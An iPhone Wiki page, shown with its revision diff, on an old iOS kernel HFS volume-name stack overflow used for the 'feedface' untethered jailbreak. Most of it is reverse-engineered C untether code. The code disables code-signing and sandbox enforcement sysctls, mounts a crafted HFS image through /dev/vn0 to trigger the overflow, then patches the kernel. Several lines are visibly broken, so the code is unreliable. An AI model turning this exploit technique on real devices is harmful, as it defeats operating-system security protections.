|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "HFS Legacy Volume Name Stack Buffer Overflow"
(New page: == Credit == pod2g Category:Exploits) |
Awesomebing1 (talk | contribs) (Better formatting. If anyone could please seperate vm_prep and main, that would be awesome.) |
||
| (14 intermediate revisions by 6 users not shown) | |||
| Line 1: | Line 1: | ||
| + | The '''HFS Legacy Volume Name Stack Buffer Overflow''' is a [[kernel]] vulnerability used to achieve an [[untethered jailbreak]]. Its exploit implementation, dubbed "feedface,"[https://twitter.com/pod2g/status/33997326070583296] was used in conjunction with limera1n's [[bootrom]] exploit or the [[usb_control_msg(0xA1, 1) Exploit]] in [[greenpois0n (jailbreak)|greenpois0n]]. |
||
| + | |||
| + | == Exploiting the Kernel Bug == |
||
| + | |||
| + | This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb |
||
| + | to take control of PC register and do basically whatever you want, in that case, they used a function called |
||
| + | real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what |
||
| + | the untether looked like. |
||
| + | |||
| + | int mnt_our_hfs() |
||
| + | { |
||
| + | struct hfs_mount_args i; |
||
| + | bzero(i, sizeof(i)); |
||
| + | i.fspec = (int)"/dev/vn0"; |
||
| + | i.hfs_uid = args.hfs_gid = 99; |
||
| + | i.hfs_mask = 0x1C5; |
||
| + | puts("[+]Triggering the kernel exploit"); |
||
| + | mount("hfs", "mnt/", MNT_RDONLY, i); |
||
| + | return puts("[+] Payload was successful"); |
||
| + | } |
||
| + | |||
| + | int prep_vn() |
||
| + | { |
||
| + | vn_ioctl vn; |
||
| + | int i = open("/dev/vn0", O_RDONLY, 0); |
||
| + | if(i < 0){ |
||
| + | puts("[-]Can't open /dev/vn0"); |
||
| + | exit(1); |
||
| + | } |
||
| + | ioctl(i, VNIOCDETACH, &vn); |
||
| + | vn.vn_file = (int)"/usr/lib/hfs_mdb"; |
||
| + | vn.vn_control = vncontrol_readwrite_io_e; |
||
| + | if(ioctl(i, VNIOCATTACH, &vn) < 0) |
||
| + | { |
||
| + | puts("[-]Coudn't attach to /dev/vn0")'' |
||
| + | close(i); |
||
| + | exit(1); |
||
| + | } |
||
| + | return close(1); |
||
| + | } |
||
| + | |||
| + | int main(int argc, char const *argv[]) |
||
| + | { |
||
| + | int result; |
||
| + | struct stat i; |
||
| + | uint32_t zero = 0, one = 1; |
||
| + | sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t)); |
||
| + | sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t)) |
||
| + | prep_vn(); |
||
| + | i.st_uid = 0; |
||
| + | i.st_gid = 0; |
||
| + | i.st_rdev = 0; |
||
| + | i.st_atimespec.tv_nsec = 0; |
||
| + | i.st_atimespec.tv_sec = 0; |
||
| + | i.st_mtimespec.tv_nsec = 0; |
||
| + | i.st_mtimespec.tv_sec = 0; |
||
| + | i.st_ctimespec.tv_sec = 0; |
||
| + | i.st_dev = (dev_t)"/dev/vn0"; |
||
| + | i.st_ino = 99; |
||
| + | i.st_uid = 453; |
||
| + | puts("[+]Trigger kernel exploit"); |
||
| + | mnt_our_hfs(); |
||
| + | sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t)); |
||
| + | patch_kernel(); |
||
| + | return 0; |
||
| + | } |
||
| + | |||
== Credit == |
== Credit == |
||
| − | [[User:pod2g|pod2g]] |
+ | [[User:Jan0|jan0]], [[User:pod2g|pod2g]], [[User:posixninja|Posixninja]] |
| + | |||
| + | == Sources for information == |
||
| + | *[http://www.twitlonger.com/show/8jep67 TwitLonger] |
||
| + | *http://pastie.org/2060071 (from a [https://twitter.com/0naj/status/80211549427482624 tweet] by [[User:jan0|jan0]]) |
||
| + | *[http://www.slideshare.net/i0n1c/blackhat-usa-2011-stefan-esser-ios-kernel-exploitation BlackHat Presentation by [[I0n1c]]] (starting at slide 24) |
||
[[Category:Exploits]] |
[[Category:Exploits]] |
||
Latest revision as of 14:21, 28 March 2015
The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface,"[1] was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.
Exploiting the Kernel Bug
This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like.
int mnt_our_hfs()
{
struct hfs_mount_args i;
bzero(i, sizeof(i));
i.fspec = (int)"/dev/vn0";
i.hfs_uid = args.hfs_gid = 99;
i.hfs_mask = 0x1C5;
puts("[+]Triggering the kernel exploit");
mount("hfs", "mnt/", MNT_RDONLY, i);
return puts("[+] Payload was successful");
}
int prep_vn()
{
vn_ioctl vn;
int i = open("/dev/vn0", O_RDONLY, 0);
if(i < 0){
puts("[-]Can't open /dev/vn0");
exit(1);
}
ioctl(i, VNIOCDETACH, &vn);
vn.vn_file = (int)"/usr/lib/hfs_mdb";
vn.vn_control = vncontrol_readwrite_io_e;
if(ioctl(i, VNIOCATTACH, &vn) < 0)
{
puts("[-]Coudn't attach to /dev/vn0")
close(i);
exit(1);
}
return close(1);
}
int main(int argc, char const *argv[])
{
int result;
struct stat i;
uint32_t zero = 0, one = 1;
sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
prep_vn();
i.st_uid = 0;
i.st_gid = 0;
i.st_rdev = 0;
i.st_atimespec.tv_nsec = 0;
i.st_atimespec.tv_sec = 0;
i.st_mtimespec.tv_nsec = 0;
i.st_mtimespec.tv_sec = 0;
i.st_ctimespec.tv_sec = 0;
i.st_dev = (dev_t)"/dev/vn0";
i.st_ino = 99;
i.st_uid = 453;
puts("[+]Trigger kernel exploit");
mnt_our_hfs();
sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
patch_kernel();
return 0;
}
Credit
Sources for information
- TwitLonger
- http://pastie.org/2060071 (from a tweet by jan0)
- BlackHat Presentation by I0n1c (starting at slide 24)
